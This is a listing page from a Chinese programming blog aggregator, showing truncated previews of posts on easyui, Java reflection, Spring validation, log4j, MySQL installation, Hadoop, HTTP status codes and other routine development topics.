js上移下移easyuidatagrid
                                    
    /**
 * 向上移动一行
 * 
 * @param dg
 * @param row
 */
function moveupRow(dg, row) {
	var datagrid = $(dg);
	var index = datagrid.datagrid("getRowIndex", row);
	if (isFirstRow(dg, row)) {
    
                                
    • 
                                
  • Java反射
                                    oloz
反射
                                    
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 
 
首先看看java中的Class 
 
package demo;

public class ClassTest {
	
	/*先了解java中的Class*/
	
	public static void main(String[] args) {
		
    //任何一个类都
    
                                
    • 
                                
  • springMVC 使用JSR-303 Validation验证
                                    杨白白
springmvc
                                    
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 
 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 
 
登录需要验证类 
 
public class Login {

	@NotEmpty
    
                                
    • 
                                
  • log4j
                                    香水浓
log4j
                                    
    
log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE
#log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML

#console
log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender
log4
    
                                
    • 
                                
  • 使用ajax和history.pushState无刷新改变页面URL
                                    agevs
jquery框架Ajaxhtml5chrome
                                    
    表现 
如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 
是什么有这么强大的功能呢? 
HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
    
                                
    • 
                                
  • centos中文乱码
                                    AILIKES
centosOSssh
                                    
    一、CentOS系统访问 g.cn ,发现中文乱码。 
于是用以前的方式:yum -y install fonts-chinese 
CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。     
  
      
  
后来,终于找到以下方法可以解决,需要两个中文支持的包: 
fonts-chinese-3.02-12.
    
                                
    • 
                                
  • 触发器
                                    baalwolf
触发器
                                    
    触发器(trigger):监视某种情况,并触发某种操作。 
触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 
语法: 
create trigger triggerName 
after/before 
    
                                
    • 
                                
  • JS正则表达式的i m g
                                    bijian1013
JavaScript正则表达式
                                    
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
    
                                
    • 
                                
  • HTML5模式和Hashbang模式
                                    bijian1013
JavaScriptAngularJSHashbang模式HTML5模式
                                    
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 
html5Mode 
        一个布尔值,标识$location服务是否运行在HTML5模式下。 
ha
    
                                
    • 
                                
  • [Maven学习笔记六]Maven生命周期
                                    bit1129
maven
                                    
    从mvn test的输出开始说起 
  
当我们在user-core中执行mvn test时,执行的输出如下: 
  
/software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
    
                                
    • 
                                
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错
                                    bit1129
hadoop
                                    
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 
 
 Task Failure 
 Application Master Failure 
 Node Manager Failure 
 Resource Manager Failure 
 1. Task Failure 
任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
    
                                
    • 
                                
  • 记一次数据推送的异常解决端口解决
                                    ronin47
记一次数据推送的异常解决
                                    
       需求:从db获取数据然后推送到B 
        程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。 
    自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。 
   service iptables stop 

    
                                
    • 
                                
  • 巧用视错觉-UI更有趣
                                    brotherlamp
UIui视频ui教程ui自学ui资料
                                    
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 
视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 
格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 
在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
    
                                
    • 
                                
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线)
                                    bylijinnan
数据结构算法线段树
                                    
    package com.ljn.base;

import java.util.Arrays;
import java.util.Comparator;
import java.util.Set;
import java.util.TreeSet;

/**
 * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177

    
                                
    • 
                                
  • HTTP协议详解
                                    chicony
http协议
                                    
    引言                                 
    
                                
    • 
                                
  • Scala设计模式
                                    chenchao051
设计模式scala
                                    
    Scala设计模式 
        
       我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
    
                                
    • 
                                
  • 安装mysql
                                    daizj
mysql安装
                                    
    安装mysql 
  (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除) 
     执行命令rpm -qa |grep mysql 检查是否删除干净 
  (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
    
                                
    • 
                                
  • HTTP状态码大全
                                    dcj3sjt126com
http状态码
                                    
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
    
                                
    • 
                                
  • asihttprequest上传图片
                                    dcj3sjt126com
ASIHTTPRequest
                                    
    NSURL *url =@"yourURL";
    ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url];
    [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
    
                                
    • 
                                
  • C语言中,关键字static的作用
                                    e200702084
C++cC#
                                    
    在C语言中,关键字static有三个明显的作用: 
 
1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 
一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
    
                                
    • 
                                
  • win7/8使用curl
                                    geeksun
win7
                                    
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。  下载地址:  
http://curl.haxx.se/download.html   请选择不带SSL的版本,否则还需要安装SSL的支持包       2.  可以给Windows增加c
    
                                
    • 
                                
  • Creating a Shared Repository; Users Sharing The Repository
                                    hongtoushizi
git
                                    
    转载自:  
http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/  Commands discussed in this section: 
 
 git init –bare 
 git clone 
 git remote 
 git pull 
 git p
    
                                
    • 
                                
  • Java实现字符串反转的8种或9种方法
                                    Josh_Persistence
异或反转递归反转二分交换反转java字符串反转栈反转
                                    
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: 
http://josh-persistence.iteye.com/blog/2205768 
  
/**
 * 
 */
package com.wsheng.aggregator.algorithm.string;

import java.util.Stack;

/**

    
                                
    • 
                                
  • 代码实现任意容量倒水问题
                                    home198979
PHP算法倒水
                                    
    形象化设计模式实战             HELLO!架构                     redis命令源码解析 
  
倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
    
                                
    • 
                                
  • Druid datasource
                                    zhb8015
druid
                                    
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
    
                                
    • 
                                
  • 两种启动监听器ApplicationListener和ServletContextListener
                                    spjich
javaspring框架
                                    
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器 
  
ServletContextListener  
特点: 依赖于sevlet容器,需要配置web.xml 
使用方法: 
public class StartListener implements 
    
                                
    • 
                                
  • JavaScript Rounding Methods of the Math object
                                    何不笑
JavaScriptMath
                                    
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen
    
                                
    •